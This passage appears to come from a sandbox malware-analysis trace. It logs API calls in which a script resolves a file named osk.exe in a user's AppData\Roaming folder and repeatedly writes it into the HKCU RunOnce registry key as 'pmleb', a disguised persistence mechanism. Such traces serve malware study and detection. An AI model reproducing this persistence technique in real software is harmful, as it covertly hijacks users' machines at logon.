pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.456] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.456] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.456] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.456] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.456] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.456] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.456] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x7b [0080.456] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.456] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x7c [0080.456] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.457] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x7b [0080.457] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.457] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.457] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.457] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.457] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.458] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.458] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.458] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.458] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.458] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.458] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.458] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.458] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.458] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.458] RegCloseKey (hKey=0x280) returned 0x0 [0080.458] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.458] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.458] SetTimer (hWnd=0x20280, nIDEvent=0x207b, uElapse=0xa, lpTimerFunc=0x0) returned 0x207b [0080.459] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.470] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.470] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.470] KillTimer (hWnd=0x20280, uIDEvent=0x207b) returned 1 [0080.471] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.471] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.471] IUnknown:Release (This=0x787518) returned 0x1 [0080.471] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.471] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.471] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.471] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.471] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.471] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.471] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.471] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.471] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.472] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x7c [0080.472] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.472] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x7d [0080.472] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.473] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x7c [0080.473] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.473] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.473] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.473] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.473] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.473] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.473] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.473] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.473] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.473] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.473] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.473] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.473] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.474] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.474] RegCloseKey (hKey=0x280) returned 0x0 [0080.474] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.474] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.474] SetTimer (hWnd=0x20280, nIDEvent=0x207c, uElapse=0xa, lpTimerFunc=0x0) returned 0x207c [0080.474] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.486] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.486] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.487] KillTimer (hWnd=0x20280, uIDEvent=0x207c) returned 1 [0080.487] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.487] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.487] IUnknown:Release (This=0x787518) returned 0x1 [0080.487] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.487] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.487] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.487] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.488] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.488] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.488] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.488] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.488] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.488] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x7d [0080.488] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.488] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x7e [0080.488] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.489] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x7d [0080.489] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f0c0 | out: ppv=0x33f0c0*=0x787518) returned 0x0 [0080.498] ??3@YAXPAX@Z () returned 0x1 [0080.498] IUnknown:Release (This=0x787518) returned 0x1 [0080.498] GetTickCount () returned 0x114a277 [0080.498] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.498] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.498] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.499] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.499] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.499] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.499] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.499] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.499] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.499] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.499] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.499] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.499] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.499] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.499] RegCloseKey (hKey=0x280) returned 0x0 [0080.500] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.500] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.500] SetTimer (hWnd=0x20280, nIDEvent=0x207d, uElapse=0xa, lpTimerFunc=0x0) returned 0x207d [0080.500] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.501] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.501] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.502] KillTimer (hWnd=0x20280, uIDEvent=0x207d) returned 1 [0080.502] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.502] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.502] IUnknown:Release (This=0x787518) returned 0x1 [0080.502] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.502] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.502] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, 